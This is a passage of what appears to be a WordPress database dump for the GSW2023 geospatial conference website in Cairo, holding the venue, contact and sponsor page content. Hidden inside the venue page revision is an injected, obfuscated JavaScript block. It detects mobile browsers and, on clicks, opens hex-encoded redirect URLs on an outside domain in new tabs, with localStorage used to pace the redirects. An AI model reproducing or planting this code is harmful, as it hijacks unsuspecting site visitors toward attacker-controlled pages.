bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-23 20:42:46','2023-06-23 20:42:46','',3066,'https://gsw2023.com/?p=4750',0,'revision','',0),
(4751,4,'2023-06-23 20:43:34','2023-06-23 20:43:34','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1687391337354{margin-top: 0px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"325\" height=\"183\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button 